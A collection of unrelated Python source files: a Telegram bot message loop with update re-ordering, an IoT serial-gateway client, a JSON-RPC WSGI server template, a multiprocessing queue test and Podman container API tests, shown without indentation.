If ``False``, no re-ordering is done. ``callback`` is applied to messages
as soon as they are pulled from queue.
:type maxhold: float
:param maxhold:
Applied only when ``ordered`` is ``True``. The maximum number of seconds
an update is held waiting for a not-yet-arrived smaller ``update_id``.
When this number of seconds is up, the update is delivered to ``callback``
even if some smaller ``update_id``\s have not yet arrived. If those smaller
``update_id``\s arrive at some later time, they are discarded.
Finally, there is this parameter, meaningful always:
:type run_forever: bool or str
:param run_forever:
If ``True`` or any non-empty string, append an infinite loop at the end of
this method, so it never returns. Useful as the very last line in a program.
A non-empty string will also be printed, useful as an indication that the
program is listening.
"""
if callback is None:
callback = self.handle
elif isinstance(callback, dict):
callback = flavor_router(callback)
collect_queue = queue.Queue()
def collector():
while 1:
try:
item = collect_queue.get(block=True)
callback(item)
except:
# Localize error so thread can keep going.
traceback.print_exc()
def relay_to_collector(update):
key = _find_first_key(update, ['message',
'edited_message',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query'])
if key in update:
collect_queue.put(update[key])
else:
print("收到了没有处理的消息",update.keys())
return update['update_id']
def get_from_telegram_server():
offset = None # running offset
allowed_upd = allowed_updates
while 1:
try:
result = self.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_upd)
# Once passed, this parameter is no longer needed.
allowed_upd = None
if len(result) > 0:
# No sort. Trust server to give messages in correct order.
# Update offset to max(update_id) + 1
offset = max([relay_to_collector(update) for update in result]) + 1
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def dictify3(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
elif type(data) is str:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def dictify27(data):
if type(data) in [str, unicode]:
return json.loads(data)
elif type(data) is dict:
return data
else:
raise ValueError()
def get_from_queue_unordered(qu):
dictify = dictify3 if sys.version_info >= (3,) else dictify27
while 1:
try:
data = qu.get(block=True)
update = dictify(data)
relay_to_collector(update)
except:
traceback.print_exc()
def get_from_queue(qu):
dictify = dictify3 if sys.version_info >= (3,) else dictify27
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
while 1:
try:
data = qu.get(block=True, timeout=qwait)
update = dictify(data)
if max_id is None:
# First message received, handle regardless.
max_id = relay_to_collector(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = relay_to_collector(update)
# clear contagious updates in buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = relay_to_collector(buffer.popleft()) # updates that arrived earlier, handle them.
else:
break # gap, no more contagious updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
# Update arrives pre-maturely, insert to buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id']-max_id-1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = relay_to_collector(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
if qwait < 0:
qwait = 0
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
collector_thread = threading.Thread(target=collector)
collector_thread.daemon = True
collector_thread.start()
if source is None:
message_thread = threading.Thread(target=get_from_telegram_server)
elif isinstance(source, queue.Queue):
if ordered:
message_thread = threading.Thread(target=get_from_queue, args=(source,))
else:
message_thread = threading.Thread(target=get_from_queue_unordered, args=(source,))
else:
raise ValueError('Invalid source')
message_thread.daemon = True # need this for main thread to be killable by Ctrl-C
message_thread.start()
self._scheduler.on_event(collect_queue.put)
self._scheduler.run_as_thread()
if run_forever:
if _isstring(run_forever):
print(run_forever)
while 1:
time.sleep(10)
import inspect
class SpeakerBot(Bot):
def __init__(self, token):
super(SpeakerBot, self).__init__(token)
self._mic = helper.Microphone()
@property
def mic(self):
return self._mic
def create_listener(self):
q = queue.Queue()
self._mic.add(q)
ln = helper.Listener(self._mic, q)
return ln
class DelegatorBot(SpeakerBot):
def __init__(self, token, delegation_patterns):
"""
:param delegation_patterns: a list of (seeder, delegator) tuples.
"""
super(DelegatorBot, self).__init__(token)
self._delegate_records = [p+({},) for p in delegation_patterns]
def _startable(self, delegate):
return ((hasattr(delegate, 'start') and inspect.ismethod(delegate.start)) and
(hasattr(delegate, 'is_alive') and inspect.ismethod(delegate.is_alive)))
def _tuple_is_valid(self, t):
return len(t) == 3 and callable(t[0]) and type(t[1]) in [list, tuple] and type(t[2]) is dict
def _ensure_startable(self, delegate):
if self._startable(delegate):
return delegate
elif callable(delegate):
return threading.Thread(target=delegate)
elif type(delegate) is tuple and self._tuple_is_valid(delegate):
func, args, kwargs = delegate
return threading.Thread(target=func, args=args, kwargs=kwargs)
else:
raise RuntimeError('Delegate does not have the required methods, is not callable, and is not a valid tuple.')
def handle(self, msg):
self._mic.send(msg)
for calculate_seed, make_delegate, dict in self._delegate_records:
id = calculate_seed(msg)
if id is None:
continue
elif isinstance(id, collections.Hashable):
if id not in dict or not dict[id].is_alive():
d = make_delegate((self, msg, id))
d = self._ensure_startable(d)
dict[id] = d
dict[id].start()
else:
d = make_delegate((self, msg, id))
d = self._ensure_startable(d)
d.start()
|
client.py
|
"""
Copyright 2018 InfAI (CC SES)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
try:
from connector_lib.client import Client
from connector_lib.modules.device_pool import DevicePool
from serial_gateway.manager import SerialManager
from serial_gateway.logger import root_logger
from web_ui.ws_console import WebsocketConsole
from web_ui.app import WebUI
except ImportError as ex:
exit("{} - {}".format(__name__, ex.msg))
from threading import Thread
import asyncio, time, json, datetime
logger = root_logger.getChild(__name__)
def pushReadings():
while True:
for controller in SerialManager.getControllers():
try:
Client.event(
controller._extended_id,
'detection',
json.dumps({
'value': float(controller._kwh),
'unit': 'kWh',
'time': '{}Z'.format(datetime.datetime.utcnow().isoformat())
}),
block=False
)
time.sleep(0.1)
except Exception as ex:
logger.error(ex)
time.sleep(20)
readings_scraper = Thread(target=pushReadings, name="Scraper")
loop = asyncio.get_event_loop()
cw = asyncio.get_child_watcher()
if __name__ == '__main__':
connector_client = Client(device_manager=DevicePool)
WebsocketConsole(loop)
WebUI()
SerialManager()
readings_scraper.start()
loop.run_forever()
|
HelloWorldServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'HelloWorld'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from HelloWorld.HelloWorldImpl import HelloWorld # noqa @IgnorePep8
impl_HelloWorld = HelloWorld(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'HelloWorld'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.rpc_service.add(impl_HelloWorld.status,
name='HelloWorld.status',
types=[dict])
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_multiprocessing.py
|
import time
import multiprocessing as mp
from multiprocessing.queues import Queue
def fill_queue(queue_x, queue_y):
""" Endless process that fills the queue"""
task = 0
while True:
time.sleep(0.00000001)
queue_x.put(task)
task += 1
queue_y.put(task)
# print(f"Added task {task}")
task += 1
def queue_get_all(queue_x, queue_y):
a = 0
while a < 2:
time.sleep(0.5)
items_x = []
items_y = []
while not queue_x.empty() and not queue_y.empty():
items_x.append(queue_x.get())
items_y.append(queue_y.get())
print(items_x)
print(items_y)
print(len(items_x))
print(len(items_y))
a += 1
if __name__ == '__main__':
queue_x = Queue(maxsize=-1, ctx=mp.get_context())
queue_y= Queue(maxsize=-1, ctx=mp.get_context())
task_fill_queue = mp.Process(target=fill_queue, args=(queue_x,queue_y))
task_fill_queue.daemon = True
task_fill_queue.start()
# read_queue(queue)
queue_get_all(queue_x, queue_y)
task_fill_queue.terminate()
task_fill_queue.join()
|
test_v2_0_0_container.py
|
import multiprocessing
import queue
import random
import threading
import unittest
import requests
import time
from dateutil.parser import parse
from .fixtures import APITestCase
class ContainerTestCase(APITestCase):
def test_list(self):
r = requests.get(self.uri("/containers/json"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
obj = r.json()
self.assertEqual(len(obj), 1)
def test_list_filters(self):
r = requests.get(
self.podman_url
+ "/v1.40/containers/json?filters%3D%7B%22status%22%3A%5B%22running%22%5D%7D"
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
containerAmnt = len(payload)
self.assertGreater(containerAmnt, 0)
def test_list_all(self):
r = requests.get(self.uri("/containers/json?all=true"))
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
def test_inspect(self):
r = requests.get(self.uri(self.resolve_container("/containers/{}/json")))
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
_ = parse(r.json()["Created"])
r = requests.post(
self.podman_url + "/v1.40/containers/create?name=topcontainer",
json={
"Cmd": ["top"],
"Image": "alpine:latest",
"Healthcheck": {
"Test": ["CMD", "pidof", "top"],
"Interval": 5000000000,
"Timeout": 2000000000,
"Retries": 3,
"StartPeriod": 5000000000,
},
},
)
self.assertEqual(r.status_code, 201, r.text)
payload = r.json()
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(self.podman_url + f"/v1.40/containers/{container_id}/json")
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
out = r.json()
self.assertIsNotNone(out["State"].get("Health"))
self.assertListEqual(["CMD", "pidof", "top"], out["Config"]["Healthcheck"]["Test"])
self.assertEqual(5000000000, out["Config"]["Healthcheck"]["Interval"])
self.assertEqual(2000000000, out["Config"]["Healthcheck"]["Timeout"])
self.assertEqual(3, out["Config"]["Healthcheck"]["Retries"])
self.assertEqual(5000000000, out["Config"]["Healthcheck"]["StartPeriod"])
r = requests.get(self.uri(f"/containers/{container_id}/json"))
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
out = r.json()
hc = out["Config"]["Healthcheck"]["Test"]
self.assertListEqual(["CMD", "pidof", "top"], hc)
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(self.podman_url + f"/v1.40/containers/{container_id}/json")
self.assertEqual(r.status_code, 200, r.text)
out = r.json()
state = out["State"]["Health"]
self.assertIsInstance(state, dict)
def test_stats(self):
r = requests.get(self.uri(self.resolve_container("/containers/{}/stats?stream=false")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertId(r.content)
r = requests.get(
self.uri(self.resolve_container("/containers/{}/stats?stream=false&one-shot=true"))
)
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertId(r.content)
def test_delete(self):
r = requests.delete(self.uri(self.resolve_container("/containers/{}?force=true")))
self.assertEqual(r.status_code, 200, r.text)
def test_stop(self):
r = requests.post(self.uri(self.resolve_container("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(self.uri(self.resolve_container("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_start(self):
r = requests.post(self.uri(self.resolve_container("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(self.uri(self.resolve_container("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_restart(self):
r = requests.post(self.uri(self.resolve_container("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(self.uri(self.resolve_container("/containers/{}/restart")), timeout=5)
self.assertEqual(r.status_code, 204, r.text)
def test_resize(self):
r = requests.post(self.uri(self.resolve_container("/containers/{}/resize?h=43&w=80")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertEqual(r.text, "", r.text)
def test_attach(self):
self.skipTest("FIXME: Test timeouts")
r = requests.post(self.uri(self.resolve_container("/containers/{}/attach?logs=true")), timeout=5)
self.assertIn(r.status_code, (101, 500), r.text)
def test_logs(self):
r = requests.get(self.uri(self.resolve_container("/containers/{}/logs?stdout=true")))
self.assertEqual(r.status_code, 200, r.text)
r = requests.post(
self.podman_url + "/v1.40/containers/create?name=topcontainer",
json={"Cmd": ["top", "ls"], "Image": "alpine:latest"},
)
self.assertEqual(r.status_code, 201, r.text)
payload = r.json()
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(
self.podman_url
+ f"/v1.40/containers/{payload['Id']}/logs?follow=false&stdout=true&until=0"
)
self.assertEqual(r.status_code, 200, r.text)
r = requests.get(
self.podman_url
+ f"/v1.40/containers/{payload['Id']}/logs?follow=false&stdout=true&until=1"
)
self.assertEqual(r.status_code, 200, r.text)
def test_commit(self):
r = requests.post(self.uri(self.resolve_container("/commit?container={}")))
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
obj = r.json()
self.assertIsInstance(obj, dict)
def test_prune(self):
name = f"Container_{random.getrandbits(160):x}"
r = requests.post(
self.podman_url + f"/v1.40/containers/create?name={name}",
json={
"Cmd": ["cp", "/etc/motd", "/motd.size_test"],
"Image": "alpine:latest",
"NetworkDisabled": True,
},
)
self.assertEqual(r.status_code, 201, r.text)
create = r.json()
r = requests.post(self.podman_url + f"/v1.40/containers/{create['Id']}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.post(self.podman_url + f"/v1.40/containers/{create['Id']}/wait")
self.assertEqual(r.status_code, 200, r.text)
wait = r.json()
self.assertEqual(wait["StatusCode"], 0, wait["Error"])
prune = requests.post(self.podman_url + "/v1.40/containers/prune")
self.assertEqual(prune.status_code, 200, prune.status_code)
prune_payload = prune.json()
self.assertGreater(prune_payload["SpaceReclaimed"], 0)
self.assertIn(create["Id"], prune_payload["ContainersDeleted"])
# Delete any orphaned containers
r = requests.get(self.podman_url + "/v1.40/containers/json?all=true")
self.assertEqual(r.status_code, 200, r.text)
for self.resolve_container in r.json():
requests.delete(
self.podman_url + f"/v1.40/containers/{self.resolve_container['Id']}?force=true"
)
# Image prune here tied to containers freeing up
prune = requests.post(self.podman_url + "/v1.40/images/prune")
self.assertEqual(prune.status_code, 200, prune.text)
prune_payload = prune.json()
self.assertGreater(prune_payload["SpaceReclaimed"], 0)
# FIXME need method to determine which image is going to be "pruned" to fix test
# TODO should handler be recursive when deleting images?
# self.assertIn(img["Id"], prune_payload["ImagesDeleted"][1]["Deleted"])
# FIXME (@vrothberg): I commented this line out during the `libimage` migration.
# It doesn't make sense to report anything to be deleted if the reclaimed space
# is zero. I think the test needs some rewrite.
# self.assertIsNotNone(prune_payload["ImagesDeleted"][1]["Deleted"])
def test_status(self):
r = requests.post(
self.podman_url + "/v1.40/containers/create?name=topcontainer",
json={"Cmd": ["top"], "Image": "alpine:latest"},
)
self.assertEqual(r.status_code, 201, r.text)
payload = r.json()
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(
self.podman_url + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
self.assertEqual(payload[0]["Status"], "Created")
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
self.podman_url + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
self.assertTrue(str(payload[0]["Status"]).startswith("Up"))
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/pause")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
self.podman_url + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
self.assertTrue(str(payload[0]["Status"]).startswith("Up"))
self.assertTrue(str(payload[0]["Status"]).endswith("(Paused)"))
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/unpause")
self.assertEqual(r.status_code, 204, r.text)
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/stop")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
self.podman_url + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
self.assertTrue(str(payload[0]["Status"]).startswith("Exited"))
